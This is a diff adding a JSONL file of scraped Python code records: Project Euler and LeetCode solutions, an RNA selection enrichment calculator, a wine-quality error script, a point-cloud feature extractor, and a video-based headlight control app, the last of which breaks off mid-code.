diff --git "a/6569.jsonl" "b/6569.jsonl" new file mode 100644--- /dev/null +++ "b/6569.jsonl" @@ -0,0 +1,2305 @@ +{"seq_id":"14201875741","text":"from math import factorial\n\n\ndef c(n, r):\n if not r <= n:\n return 0\n return factorial(n) / (factorial(r) * factorial(n - r))\n\n\ntarget = 100\nover = 1_000_000\n\namount = 0\nfor n_num in range(1,target+1):\n for r_num in range(n_num, 0, -1):\n value = c(n_num, r_num)\n if value > over:\n amount += 1\n\nprint(\"Amount of values for nCr for 1<=n<=%s that are over %s: %s\" % (target, over, amount))\n","repo_name":"Lordfirespeed/BunchaPythonStuff","sub_path":"Project Euler/#53 - Combinatoric Selections.py","file_name":"#53 - Combinatoric Selections.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26214786371","text":"# https://leetcode.com/problems/path-sum-iv/\n# 1AC, what's the point?\nclass Solution:\n def pathSum(self, nums: List[int]) -> int:\n nodes = {}\n leaves = set()\n for x in nums:\n depth = x // 100 % 10 - 1\n row_id = x // 10 % 10 - 1\n val = x % 10\n node_id = (1 << depth) + row_id\n nodes[node_id] = val\n leaves.add(node_id)\n if (node_id >> 1) in nodes:\n nodes[node_id] += nodes[node_id >> 1]\n if (node_id >> 1) in leaves:\n leaves.remove(node_id >> 1)\n res = 0\n for x in leaves:\n res += nodes[x]\n return res\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/0501-1000/0666_path-sum-iv_1_AC.py","file_name":"0666_path-sum-iv_1_AC.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"} +{"seq_id":"9625607482","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: Rachel Kelemen\r\n@deputy wizard: Joshua Brown\r\nFinalized April 2019\r\n\r\nThis module contains a function which calculates the enrichment of each sequence in each\r\nselection and writes the results to a csv file.\r\n\"\"\"\r\n\r\nimport csv\r\nimport numpy as np\r\nfrom statistics import mean, stdev\r\n\r\ndef calculate_enrichments(sequence_count_dict, read_counts, biosamples, sel_1_name,\r\n sel_2_name, sel_2_runs, output_format, full_sequence_format,\r\n rand_expected_pairs, working_folder_name, lib_name, min_lib_count):\r\n \"\"\"Calculates the enrichment of each sequence in eaach selection relative to the\r\n library and writes the results to results.csv.\r\n\r\n Parameters\r\n ---\r\n sequence_count_dict : dict\r\n biosample : list\r\n sel_1_name : str\r\n sel_2_name : str\r\n sel_2_runs : list\r\n output_format : str\r\n full_sequence_format : str\r\n rand_expected_pairs : list\r\n working_folder_name : str\r\n lib_name : str\r\n\r\n Returns\r\n ---\r\n results_table : list\r\n For each sequence the entry looks like\r\n [[randomized_sequence], [full_stem_sequence], []]\r\n\r\n Notes\r\n ---\r\n results_table structure\r\n COLUMN HEADER CONTENTS\r\n 0 Randomized sequence [formatted randomized sequence]\r\n 1 Full stem sequence [formatted full stem sequence]\r\n 2 Paired bases [number of paired bases]\r\n 3 Raw counts [lib_count, sel_1_count, sel_2_count...]\r\n 4 Fraction of total [lib_fraction, sel_1_fraction, sel_2_fraction...]\r\n 5 Fold enrichment [sel_1_fold_enrichment, sel_2_fold_enrichment...]\r\n 6 Enrichment factors [sel_1_enrichment_factor, sel_2_enrichment_factor...]\r\n 7 Enrichment ranks [sel_1_rank, sel_2_rank...]\r\n 8 Average enrichment factor [average enrichment factor]\r\n 9 StDev [enrichment factor standard deviation]\r\n 10 Rank [rank based on average enrichment factor]\r\n\r\n Results table is written to working_folder\\results\\lib_name results.csv\r\n \"\"\"\r\n\r\n # Setup\r\n # Set up column indices by name because it's clearer than referring to them by number.\r\n (Randomized_sequence, Full_stem_sequence, Paired_bases,\r\n Raw_counts, Fraction_of_total,\r\n Fold_enrichment, Enrichment_factor, Enrichment_rank,\r\n Avg_enrichment_factor, Stdev, Avg_rank) = (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10)\r\n\r\n # Column headers\r\n header_list = ['Randomized sequence', 'Full stem sequence', 'Paired bases',\r\n 'Raw counts','Fraction of total',\r\n 'Fold enrichment', 'Enrichment factors', 'Enrichment ranks',\r\n 'Average enrichment factor', 'StDev', 'Average rank']\r\n\r\n # For pairing analysis, which pairs are considered valid?\r\n # Typically GU pairs are \"valid\" for tRNAs\r\n # A future goal is to come up with some metric for pairing strength\r\n # Pi stacking between adjacent bases?\r\n valid_pairs = {'A':['U'],\r\n 'C':['G'],\r\n 'G':['C','U'],\r\n 'U':['A','G']}\r\n\r\n # Sequences will be added to one of two tables, sequence_table or\r\n # low_abundance_table.\r\n\r\n # If there are any sequences which are present in selection runs but not present in\r\n # the library, this will cause divide by 0 errors later in the analysis.\r\n # Therefore, only certain parts of the analysis - calculating paired bases and % of\r\n # total reads - can be performed for these sequences.\r\n\r\n # Additionally, sequences which are only observed a very small number of times in the\r\n # library could lead to inaccurate enrichment factors - if a sequence was seen twice\r\n # instead of once in the library, for instance, the enrichment factor would be off\r\n # by a factor of two.\r\n\r\n # sequence_table holds sequences which were found >= min_lib_count times in the\r\n # library biosample.\r\n sequence_table = []\r\n # Enrichment factors will be calculated for these sequences.\r\n\r\n # low_abundance_table holds sequences which were identified < min_lib_count times\r\n # in the library biosample.\r\n low_abundance_table = []\r\n # Enrichment factors will still be calculated for sequences which were identified\r\n # > 0 times in the library biosample, but these values should be used cautiously.\r\n # Track how many sequences were not observed at all\r\n not_observed = 0\r\n\r\n # Lastly, we'll need to find the highest fold enrichment value for each selection\r\n # before we can calculate the enrichment factors.\r\n max_fold_enrichments = np.zeros(len(biosamples))\r\n\r\n\r\n # Read sequence counts from sequence_count_dict.\r\n for sequence in sequence_count_dict:\r\n # Set up table row sequence_data\r\n sequence_data = []\r\n for header in header_list:\r\n sequence_data.append([])\r\n\r\n # 0. Randomized sequence\r\n # Format sequences for output\r\n # Replace T's with U's, but keep the original as key_sequence for sequence_count_dict\r\n key_sequence = sequence\r\n sequence = sequence.replace('T', 'U')\r\n if output_format:\r\n # output_format is represented as 'NNN/NNN' where each N is to be replaced\r\n # with a base from sequence and all other characters are preserved.\r\n # Iterate through characters in output_format to generate formatted_sequence.\r\n formatted_sequence = ''\r\n # i represents the current position in sequence, starting at the beginning.\r\n i = 0\r\n for c in output_format:\r\n if c == 'N':\r\n formatted_sequence += sequence[i]\r\n i += 1\r\n else:\r\n formatted_sequence += c\r\n else:\r\n formatted_sequence = sequence\r\n sequence_data[Randomized_sequence].append(formatted_sequence)\r\n\r\n # 1. Full stem sequence\r\n # Allows visualization of an entire stem, even if only part of the stem was\r\n # randomized in the lirbary, and facilitates comparison between libraries in the\r\n # same region.\r\n # Similar to how formatted_sequence is generated\r\n if full_sequence_format:\r\n full_sequence = ''\r\n # i represents the current position in sequence, starting at the beginning.\r\n i = 0\r\n for c in full_sequence_format:\r\n if c == 'N':\r\n full_sequence += sequence[i]\r\n i += 1\r\n else:\r\n full_sequence += c\r\n else:\r\n full_sequence = formatted_sequence\r\n sequence_data[Full_stem_sequence].append(full_sequence)\r\n\r\n # 2. Paired bases\r\n # Count how many bases in the sequence are paired, based on valid_pairs\r\n # This uses sequence, not formatted_sequence\r\n # Start with 0 pairs\r\n paired = 0\r\n # Iterate through expected pairs using rand_expected_pairs coordinates, which only\r\n # include the randomized bases (unlike expected_pairs which provides pair\r\n # coordinates for the full sequence).\r\n for pair in rand_expected_pairs:\r\n # Extract coordinates and check for pairs\r\n a, b = pair[0], pair[1]\r\n if sequence[a] in valid_pairs[sequence[b]]:\r\n paired += 1\r\n sequence_data[Paired_bases].append(paired)\r\n\r\n # 3. Raw counts and\r\n # 4. Fraction of total\r\n for raw_count, total in zip(sequence_count_dict[key_sequence], read_counts):\r\n sequence_data[Raw_counts].append(raw_count)\r\n sequence_data[Fraction_of_total].append(raw_count/total)\r\n\r\n # Sequences found in library biosample\r\n # Calculate the change in abundance before and after each selection,\r\n # relative to the library.\r\n if sequence_data[Raw_counts][0] > 0:\r\n # 6. Fold enrichments\r\n library_abundance = sequence_data[Fraction_of_total][0]\r\n for selection_abundance, i in zip(sequence_data[Fraction_of_total],\r\n np.arange(len(max_fold_enrichments), dtype=int)):\r\n fold_enrichment = selection_abundance / library_abundance\r\n sequence_data[Fold_enrichment].append(fold_enrichment)\r\n # Update max_fold_enrichments unless the value comes from a low abundance\r\n # sequence.\r\n if sequence_data[Raw_counts][0] >= min_lib_count:\r\n if fold_enrichment > max_fold_enrichments[i]:\r\n max_fold_enrichments[i] = fold_enrichment\r\n\r\n if sequence_data[Raw_counts][0] >= min_lib_count:\r\n sequence_table.append(sequence_data)\r\n else:\r\n low_abundance_table.append(sequence_data)\r\n not_observed += 1\r\n\r\n # Sequences not found in library biosample\r\n # Enrichment cannot be calculated because the library abundance is 0.\r\n # Calculate the value if the library count was 1\r\n else:\r\n # What would library_abundance be if the library count was 1?\r\n library_abundance = 1 / read_counts[0]\r\n for selection_abundance, i in zip(sequence_data[Fraction_of_total],\r\n np.arange(len(max_fold_enrichments))):\r\n fold_enrichment = selection_abundance / library_abundance\r\n sequence_data[Fold_enrichment].append(fold_enrichment)\r\n # Do not update fold enrichments.\r\n low_abundance_table.append(sequence_data)\r\n\r\n\r\n # 6. Enrichment factors,\r\n # 8. Average enrichment factors, and\r\n # 9. StDev\r\n # Once finished iterating through all sequences and adding to tables, use\r\n # max_fold_enrichments to determine enrichment factor for each sequence\r\n # enrichment_factor = fold_enrichment / max_fold_enrichment\r\n for table in [sequence_table, low_abundance_table]:\r\n for sequence_data in table:\r\n for fold_enrichment, max_fold_enrichment in zip(sequence_data[Fold_enrichment],\r\n max_fold_enrichments):\r\n enrichment_factor = fold_enrichment / max_fold_enrichment\r\n sequence_data[Enrichment_factor].append(enrichment_factor)\r\n # Calculate average enrichments\r\n # If there are distinctly identified sel_1 and sel_2 runs (e.g. 1x vs 2x TAG)\r\n # Calculate three means and stdevs: [sel_1_mean, sel_2_mean, all_sels_mean]\r\n if sel_2_runs:\r\n sel_1_enrichment_factors = sequence_data[Enrichment_factor][1:-len(sel_2_runs)]\r\n sel_2_enrichment_factors = sequence_data[Enrichment_factor][-len(sel_2_runs):]\r\n sequence_data[Avg_enrichment_factor].append(mean(sel_1_enrichment_factors))\r\n sequence_data[Avg_enrichment_factor].append(mean(sel_2_enrichment_factors))\r\n if len(sel_1_enrichment_factors) > 1:\r\n sequence_data[Stdev].append(stdev(sel_1_enrichment_factors))\r\n else:\r\n sequence_data[Stdev].append(0)\r\n if len(sel_2_enrichment_factors) > 1:\r\n sequence_data[Stdev].append(stdev(sel_2_enrichment_factors))\r\n else:\r\n sequence_data[Stdev].append(0)\r\n # Calculate the mean enrichment factor and stdev for all selections.\r\n all_enrichment_factors = sequence_data[Enrichment_factor][1:]\r\n sequence_data[Avg_enrichment_factor].append(mean(all_enrichment_factors))\r\n if len(all_enrichment_factors) > 1:\r\n sequence_data[Stdev].append(stdev(all_enrichment_factors))\r\n else:\r\n sequence_data[Stdev].append(0)\r\n\r\n # 7. Rank by enrichment factors and\r\n # 9. Rank by average enrichment factor(s)\r\n for table in [sequence_table, low_abundance_table]:\r\n # Individual selection enrichment factors\r\n for i in np.arange(len(biosamples)):\r\n # Sort sequence_table by enrichment factor i, largest values first\r\n table = sorted(table, key = lambda x: x[Enrichment_factor][i],\r\n reverse=True)\r\n # Add rank+1 to sequence_table (add 1 to start at 1 not 0)\r\n for rank in range(len(table)):\r\n table[rank][Enrichment_rank].append(rank+1)\r\n # Average enrichment factor(s)\r\n # How many enrichment factors to expect?\r\n if sel_2_runs:\r\n n = 3\r\n else:\r\n n = 1\r\n for i in np.arange(n):\r\n # Sort sequence_table by enrichment factor i, largest values first\r\n table = sorted(table, key = lambda x: x[Avg_enrichment_factor][i],\r\n reverse=True)\r\n # Add rank+1 to sequence_table (add 1 to start at 1 not 0)\r\n for rank in range(len(table)):\r\n table[rank][Avg_rank].append(rank+1)\r\n\r\n # Sort tables by average enrichment factor outside of the above loop\r\n sequence_table = sorted(sequence_table, key = lambda x: x[Avg_enrichment_factor][-1],\r\n reverse=True)\r\n low_abundance_table = sorted(low_abundance_table, key = lambda x: x[Avg_enrichment_factor][-1],\r\n reverse=True)\r\n\r\n # Print results\r\n print('/nStats for the library run:')\r\n print('Of {:,} sequences, {:,} were observed >= {} times'.format(\r\n len(sequence_count_dict), len(sequence_table), min_lib_count))\r\n print('{:,} sequences were observed < {} times, with {} not observed'.format(\r\n len(low_abundance_table), min_lib_count, not_observed))\r\n\r\n print('/nMost enriched sequence: ', sequence_table[0][Randomized_sequence])\r\n print('Least enriched sequence: ', sequence_table[-1][Randomized_sequence])\r\n\r\n print('/nData for the top sequence:')\r\n for header, value in zip(header_list, sequence_table[0]):\r\n print(header, value)\r\n\r\n\r\n # Write the results to csv files.\r\n # Tables are already sorted by average enrichment factor.\r\n # Table structure reminder:\r\n '''\r\n COLUMN HEADER CONTENTS\r\n 0 Randomized sequence [formatted randomized sequence]\r\n 1 Full stem sequence [formatted full stem sequence]\r\n 2 Paired bases [number of paired bases]\r\n 3 Raw counts [lib_count, sel_1_count, sel_2_count...]\r\n 4 Fraction of total [lib_fraction, sel_1_fraction, sel_2_fraction...]\r\n 5 Fold enrichment [sel_1_fold_enrichment, sel_2_fold_enrichment...]\r\n 6 Enrichment factors [sel_1_enrichment_factor, sel_2_enrichment_factor...]\r\n 7 Enrichment ranks [sel_1_rank, sel_2_rank...]\r\n 8 Average enrichment factor [average enrichment factor]\r\n 9 StDev [enrichment factor standard deviation]\r\n 10 Rank [rank based on average enrichment factor]\r\n '''\r\n\r\n for table, file_name_end in zip([sequence_table, low_abundance_table], [' Results.csv',\r\n ' Low abundance sequences.csv']):\r\n output_file_address = working_folder_name + '//Results//' + lib_name + file_name_end\r\n with open(output_file_address, 'w', newline='') as output_file:\r\n # Clear any previous data\r\n output_file.truncate(0)\r\n\r\n # Write\r\n output_writer = csv.writer(output_file)\r\n # Write headers and subheaders\r\n header_row = []\r\n subheader_row = []\r\n # Randomized sequence, Full stem sequence, and Paired bases each only\r\n # contain 1 value.\r\n for header in header_list[Randomized_sequence:Raw_counts]:\r\n header_row.append(header)\r\n subheader_row.append('')\r\n # Raw counts, Fraction of total, Fold enrichment, Enrichment factors, and\r\n # Enrichment ranks have one value for each biosample.\r\n for header in header_list[Raw_counts:Avg_enrichment_factor]:\r\n header_row.append(header)\r\n for l in range(len(biosamples)-1):\r\n header_row.append('')\r\n for biosample in biosamples:\r\n subheader_row.append(biosample)\r\n # Average enrichment factor and Rank 3 values if there are distinct sel_1 and\r\n # sel_2 conditions, [Sel_1, Sel_2, and All selections].\r\n if sel_2_runs:\r\n for header in header_list[Avg_enrichment_factor:]:\r\n header_row.append(header)\r\n header_row.append('')\r\n header_row.append('')\r\n for selection_name in [sel_1_name, sel_2_name, 'All selections']:\r\n subheader_row.append(selection_name)\r\n # Otherwise there is just one value for all selections.\r\n else:\r\n for header in header_list[Avg_enrichment_factor:]:\r\n header_row.append(header)\r\n subheader_row.append('All selections')\r\n output_writer.writerow(header_row)\r\n output_writer.writerow(subheader_row)\r\n\r\n # Write data\r\n for sequence_data in table:\r\n data_row = []\r\n for column in sequence_data:\r\n for value in column:\r\n data_row.append(value)\r\n output_writer.writerow(data_row)\r\n\r\n print('/nData written to')\r\n print(output_file_address)\r\n\r\n\r\n return sequence_table, low_abundance_table","repo_name":"chatterjeelab2022/VADER","sub_path":"calculate_enrichments.py","file_name":"calculate_enrichments.py","file_ext":"py","file_size_in_byte":17952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35927762954","text":"#This program gives the weight of wine parameters for the quality equation\r\n#Parameters taking into consideration: FIXED ACIDITY, pH, ALCOHOL\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom math import sqrt\r\nimport quality_equation as qe\r\n\r\n\r\n# Preprocessing Input data\r\ndata = pd.read_csv('wines_red_all_parameters.csv')\r\n\r\n\r\n#Compute the weight of each parameter on the qaulity equation,\r\npar=qe.parameters()\r\n\r\n#Create computed quality and real quality vector\r\nq_computed=[]\r\nq=[]\r\n\r\nnumber_samples=1000\r\nstart=0\r\nfor i in range(start,start+number_samples):\r\n wine = data.iloc[i,:]\r\n\r\n q_pred = wine[0]*par[0] + wine[8]*par[1] + wine[10]*par[2]\r\n q_computed.append(round(q_pred))\r\n q.append(wine[11])\r\n\r\n\r\n\r\nerror=0\r\nfor i in range(number_samples):\r\n er=(q[i]-q_computed[i])*(q[i]-q_computed[i])\r\n error = error + er\r\nprint(error)\r\n\r\n\r\nRMSE=sqrt(error/number_samples)\r\nprint('The value of the RMSE is: ' + str(RMSE))\r\n","repo_name":"ruchawaghulde/Wine-Quality-Prediction","sub_path":"Codes/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23808226284","text":"import numpy as np\r\nimport pandas as pd\r\nfrom skimage import color\r\nfrom nss_functions import * \r\nfrom pyntcloud import PyntCloud\r\nimport os \r\n\r\ndef get_feature_vector(objpath): \r\n #load colored point cloud\r\n print(\"Begin loading point cloud\")\r\n cloud = PyntCloud.from_file(objpath)\r\n \r\n #begin geometry projection\r\n print(\"Begin geometry feature extraction.\")\r\n k_neighbors = cloud.get_neighbors(k=10)\r\n ev = cloud.add_scalar_field(\"eigen_values\", k_neighbors=k_neighbors)\r\n cloud.add_scalar_field(\"curvature\", ev=ev)\r\n cloud.add_scalar_field(\"anisotropy\",ev=ev)\r\n cloud.add_scalar_field(\"linearity\",ev=ev)\r\n cloud.add_scalar_field(\"planarity\",ev=ev)\r\n cloud.add_scalar_field(\"sphericity\",ev=ev)\r\n curvature = cloud.points['curvature(11)'].to_numpy()\r\n anisotropy = cloud.points['anisotropy(11)'].to_numpy()\r\n linearity = cloud.points['linearity(11)'].to_numpy()\r\n planarity = cloud.points['planarity(11)'].to_numpy()\r\n sphericity = cloud.points['sphericity(11)'].to_numpy()\r\n\r\n\r\n #begin color projection\r\n print(\"Begin color feature extraction.\")\r\n rgb_color = cloud.points[['red','green','blue']].to_numpy()/255\r\n lab_color = color.rgb2lab(rgb_color)\r\n l = lab_color[:,0]\r\n a = lab_color[:,1]\r\n b = lab_color[:,2]\r\n \r\n \r\n print(\"Begin NSS parameters estimation.\")\r\n # compute nss parameters\r\n nss_params = []\r\n # compute color nss features\r\n for tmp in [l,a,b]:\r\n params = get_color_nss_param(tmp)\r\n #flatten the feature vector\r\n nss_params = nss_params + [i for item in params for i in item]\r\n # compute geomerty nss features\r\n for tmp in [curvature,anisotropy,linearity,planarity,sphericity]:\r\n params = get_geometry_nss_param(tmp)\r\n #flatten the feature vector\r\n nss_params = nss_params + [i for item in params for i in item]\r\n return nss_params\r\n\r\n#demo\r\nobjpath = \"models/hhi_5.ply\"\r\nfeatures = get_feature_vector(objpath)\r\n\r\n#show the features\r\ncnt = 0\r\nfor feature_domain in ['l','a','b']:\r\n for param in [\"mean\",\"std\",\"entropy\"]:\r\n print(feature_domain + \"_\" + param + \": \" + str(features[cnt]))\r\n cnt = cnt + 1\r\nfor feature_domain in ['curvature','anisotropy','linearity','planarity','sphericity']:\r\n for param in [\"mean\",\"std\",\"entropy\",\"ggd1\",\"ggd2\",\"aggd1\",\"aggd2\",\"aggd3\",\"aggd4\",\"gamma1\",\"gamma2\"]:\r\n print(feature_domain + \"_\" + param + \": \" + str(features[cnt]))\r\n cnt = cnt + 1\r\n","repo_name":"zzc-1998/NR-3DQA","sub_path":"feature_extract_pc/feature_extract.py","file_name":"feature_extract.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"17722577329","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter import filedialog as fd\nimport cv2\nimport numpy as np\nimport random\nimport os.path\nfrom os import path\nfrom PIL import Image, ImageFont, ImageDraw, ImageTk\nimport sched, time\nimport threading\nimport moviepy.editor as mp\nimport serial\n\nrandom.seed(100)\n\n\n#arayüz tanımları\nroot = Tk() \nroot.title(\"Etkin Araç Far Ayarlama Uygulaması\") \nroot.maxsize(900, 600) \nroot.config(bg=\"#008000\") \n\nleft_frame = Frame(root, width=200, height=500, bg='grey')\nleft_frame.grid(row=0, column=0, padx=10, pady=5)\nright_frame = Frame(root, width=650, height=400, bg='grey')\nright_frame.grid(row=0, column=1, padx=10, pady=5)\n\ndef check_int(s):\n if s[0] in ('-', '+'):\n return s[1:].isdigit()\n return s.isdigit()\n\ndef DrawImageBox(image):\n for widget in right_frame.winfo_children():\n widget.destroy()\n Label(right_frame, image=image).grid(row=0,column=0, padx=5, pady=5)\n\nschedule = sched.scheduler(time.time, time.sleep)\ndef PrintScreen(textString):\n img = Image.new('RGBA' ,(650,400), 'grey')\n font= ImageFont.truetype(\"arial.ttf\",15)\n w,h= font.getsize(textString)\n draw = ImageDraw.Draw(img)\n draw.text(((650-w)/2,(400-h)/2), textString,font=font, fill='white')\n image = ImageTk.PhotoImage(img)\n schedule.enter(5, 1, DrawImageBox(image))\n schedule.run()\n\ndef ResizeVideo(videoPath):\n if path.exists(\"temp/movie_temp_\" + os.path.basename(videoPath) +\".mp4\"):\n print (\"video işlemiş\" )\n #os.remove(\"movie_temp.mp4\")\n else:\n clip = mp.VideoFileClip(videoPath)\n clip_resized = clip.resize(height=360) \n clip_resized.write_videofile(\"temp/movie_temp_\" + os.path.basename(videoPath) +\".mp4\")\n \n\nLabel(left_frame, text=\"Eren OKUR 21908613\\nOtomotiv Proje Çalışması\").grid(row=0, column=0, padx=5, pady=5)\n\ndef CreateDirectory(givenPath):\n try:\n os.makedirs(givenPath)\n except OSError:\n print (\"dizin oluşturma yapılamadı: %s \" % givenPath)\n else:\n print (\"dizin başarılı şekilde oluşturuldu %s\" % givenPath)\n\n\nif path.exists('temp') and path.exists('data') and path.exists('data/student.jpg'):\n studentRawimage = Image.open(\"data/student.jpg\")\n studentRawimage = studentRawimage.resize((150, 150), Image.ANTIALIAS)\n studentImage = ImageTk.PhotoImage(studentRawimage)\n Label(left_frame, image=studentImage).grid(row=1, column=0, padx=5, pady=5)\n img = Image.new('RGBA' ,(650,400), 'grey')\n textString = \"Hoş geldiniz...\\nÖnce bir video seçiniz \\nSonra yola çıka tıklayınız\"\n font= ImageFont.truetype(\"arial.ttf\",15)\n w,h= font.getsize(textString)\n draw = ImageDraw.Draw(img)\n draw.text(((650-w)/2,(400-h)/2), textString,font=font, fill='white')\n image = ImageTk.PhotoImage(img)\n DrawImageBox(image)\nelse:\n if not path.exists('temp'):\n CreateDirectory('temp');\n if not path.exists('data'):\n CreateDirectory('data');\n img = Image.new('RGBA' ,(650,400), 'white')\n if not path.exists(\"data/student.jpg\"):\n textString = \"Hoş geldiniz...\\nBir video seçerek işleme başlayabilirsiniz\\nBir adet uyarı mavcut:\\nÖğrenci resmi bulunamadı.\\nÖğrenci resmini data dizininin içine student.jpg ismi ile yapıştırınız.\"\n else:\n textString = \"Hoş geldiniz...\\nÖnce bir video seçiniz \\nSonra yola çıka tıklayınız\"\n font= ImageFont.truetype(\"arial.ttf\",15)\n w,h= font.getsize(textString)\n draw = ImageDraw.Draw(img)\n draw.text((100,150), textString,font=font, fill='white')\n image = ImageTk.PhotoImage(img)\n DrawImageBox(image)\n\n\n\ntool_bar = Frame(left_frame, width=180, height=185)\ntool_bar.grid(row=2, column=0, padx=5, pady=5)\n\ndef ChooseVideo():\n ChooseVideo.VideoPath = \"\"\n file = fd.askopenfile()\n if file: \n ChooseVideo.VideoPath = file.name\n ResizeVideo(ChooseVideo.VideoPath)\n PrintScreen(\"Video yolu:\\n\" + os.path.basename(ChooseVideo.VideoPath) + \" seçildi\")\n\ndef img_estim(img):\n thrshldsunnyMin= 60\n thrshldshortMax = 40\n thrshldshortMin = 20\n thrshldlongMax = 20\n thrshldlongMin = 0\n thrshlddayMax = 60\n thrshlddayMin = 40\n meanValue = np.mean(img)\n if meanValue > thrshldsunnyMin :\n #return 'light' if is_light else 'dark'\n return 'nolight'\n if thrshldshortMax > meanValue > thrshldshortMin:\n return 'nightshort'\n if thrshldlongMax > meanValue > thrshldlongMin:\n return 'nightshort'\n if thrshlddayMax > meanValue > thrshlddayMin:\n return 'daylight'\n\ndef ProcessTravel(IsComActive):\n if hasattr(ChooseVideo, 'VideoPath'):\n cap = cv2.VideoCapture(\"temp/movie_temp_\" + os.path.basename(ChooseVideo.VideoPath) +\".mp4\")\n fgbg = cv2.createBackgroundSubtractorMOG2(history=500, detectShadows=True) # filter model detec gery shadows for removing\n size = (int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)),\n int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))) \n fourcc = cv2.VideoWriter_fourcc(*'mp4v') \n out = cv2.VideoWriter('temp/video.avi',fourcc ,20,size) #20 number of frames per second\n frameID = 0\n contours_info = []\n static_back = None\n time = []\n dayEstimationStringTemp = \"Degerlendiriliyor\"\n MotionAliasTemp = \"Degerlendiriliyor\"\n dayEstimationStringAlias = \"Degerlendiriliyor\"\n MotionAlias = \"Degerlendiriliyor\"\n actionBufferCycle= 60;\n dayEstimationCycle= 0;\n MotionAliasCycle= 0;\n areaOfVideoFrame = size[0]* size[1] \n notification = FALSE\n # main loop:\n while True:\n ret, frame = cap.read()\n if ret:\n original_frame = frame.copy()\n motion_frame = frame.copy()\n carMotion = 0\n gray = cv2.cvtColor(motion_frame, cv2.COLOR_BGR2GRAY) \n gray = cv2.GaussianBlur(gray, (21, 21), 0) \n if static_back is None: \n static_back = gray \n continue\n diff_frame = cv2.absdiff(static_back, gray) \n thresh_frame = cv2.threshold(diff_frame, 30, 255, cv2.THRESH_BINARY)[1] \n thresh_frame = cv2.dilate(thresh_frame, None, iterations = 2) \n cnts,_ = cv2.findContours(thresh_frame.copy(), \n cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) \n for contour in cnts: \n motionValue = cv2.contourArea(contour)\n if motionValue < 10000: \n carMotion = 0 \n else:\n carMotion = 1\n break\n fgmask = fgbg.apply(frame)\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (2, 2))\n closing = cv2.morphologyEx(fgmask, cv2.MORPH_CLOSE, kernel)\n opening = cv2.morphologyEx(closing, cv2.MORPH_OPEN, kernel)\n dilation = cv2.dilate(opening, kernel, iterations = 2)\n dilation[dilation < 240] = 0\n dayEstimationString = img_estim(original_frame)\n contours, hierarchy = cv2.findContours(dilation, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n LightSourceDetectionCount = 0\n ListSourceSize = (0,0)\n for cID, contour in enumerate(contours):\n M = cv2.moments(contour)\n if M['m00'] < 400:\n continue\n c_centroid = int(M['m10']/M['m00']), int(M['m01']/M['m00'])\n c_area = M['m00']\n try:\n c_perimeter = cv2.arcLength(contour, True)\n except:\n c_perimeter = cv2.arcLength(contour, False)\n c_convexity = cv2.isContourConvex(contour)\n (x, y, w, h) = cv2.boundingRect(contour)\n br_centroid = (x + int(w/2), y + int(h/2)) \n LightSourceDetectionCount = LightSourceDetectionCount + 1\n if x+w * y+h > ListSourceSize[0] * ListSourceSize[1]:\n ListSourceSize = (x+w,y+h)\n if dayEstimationString != \"nolight\":\n cv2.rectangle(original_frame,(x,y),(x+w,y+h),(0,255,0),2)\n cv2.putText(original_frame, str(cID), (x+w,y+h), cv2.FONT_HERSHEY_PLAIN, 3, (127, 255, 255), 1)\n contours_info.append([cID,frameID,c_centroid,br_centroid,c_area,c_perimeter,c_convexity,w,h])\n cv2.moveWindow('fg', 40,30)\n cv2.imshow('fg',dilation)\n font = cv2.FONT_HERSHEY_SIMPLEX \n textColor = color = (255, 255, 255)\n IsNodifyActive = False\n areaOfLightSource = ListSourceSize[0]*ListSourceSize[1]\n if dayEstimationString == \"nolight\" or dayEstimationString == \"daylight\" :\n if areaOfLightSource > areaOfVideoFrame / 2 and dayEstimationStringTemp == \"nightshort\" :\n notification = True\n dayEstimationString = \"nightshort\"\n IsNodifyActive = True\n else:\n notification = False\n\n\n if dayEstimationStringTemp == \"nightshort\" and dayEstimationString == \"nightshort\" and LightSourceDetectionCount == 0:\n dayEstimationString = \"nightlong\"\n\n if carMotion:\n MotionAliasTemp = \"haretli\" \n else:\n dayEstimationStringAlias = dayEstimationStringAlias \n MotionAliasTemp = \"arac duruyor\"\n\n if MotionAliasTemp != MotionAlias:\n MotionAliasCycle = MotionAliasCycle + 1\n if MotionAliasCycle >= actionBufferCycle:\n MotionAlias = MotionAliasTemp\n MotionAliasCycle = 0\n\n if dayEstimationStringTemp != dayEstimationString:\n dayEstimationCycle = dayEstimationCycle + 1\n if dayEstimationCycle >= actionBufferCycle:\n dayEstimationCycle = 0\n if MotionAlias == \"haretli\":\n if dayEstimationString == \"nolight\":\n dayEstimationStringTemp = \"nolight\"\n if IsComActive:\n CloseLights()\n dayEstimationStringAlias = \"isiklar kapali(Gunduz)\"\n if dayEstimationString == \"nightlong\":\n dayEstimationStringTemp = \"nightlong\"\n if IsComActive:\n LongLights()\n dayEstimationStringAlias = \"isiklar acik(cok karanlik)\"\n if dayEstimationString == \"nightshort\":\n dayEstimationStringTemp = \"nightshort\"\n if IsComActive:\n ShortLights()\n dayEstimationStringAlias = \"isiklar acik(sehir ici yada otoban)\"\n if dayEstimationString == \"daylight\":\n dayEstimationStringTemp = \"daylight\"\n if IsComActive:\n DayLights()\n dayEstimationStringAlias = \"isiklar acik(aksam vakti)\"\n if IsNodifyActive:\n if IsComActive:\n LongLights()\n 